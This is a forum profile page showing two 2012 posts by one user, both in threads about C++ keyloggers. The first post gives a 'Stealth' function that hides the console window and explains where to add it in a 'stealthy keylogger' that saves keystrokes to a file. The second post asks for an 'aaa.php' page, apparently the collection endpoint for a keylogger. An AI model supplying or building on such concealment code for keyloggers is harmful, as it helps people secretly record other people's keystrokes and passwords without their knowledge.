Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - Grand

Pages: [1]
1
C - C++ / Re: C++ stealthy keylogger
« on: December 15, 2012, 10:28:08 am »
Search for
Code: [Select]
int Save (int key_stroke, char *file);and add this under that.
Code: [Select]
void Stealth();

This where you like to.


Code: [Select]
void Stealth()
{
  HWND stealth;
  AllocConsole();
  stealth = FindWindowA("ConsoleWindowClass", NULL);
  ShowWindow(stealth,0);
}

2
C - C++ / Re: [C++]KeyLogger(simple help)
« on: December 15, 2012, 12:28:09 am »
I need that aaa.php page.

Pages: [1]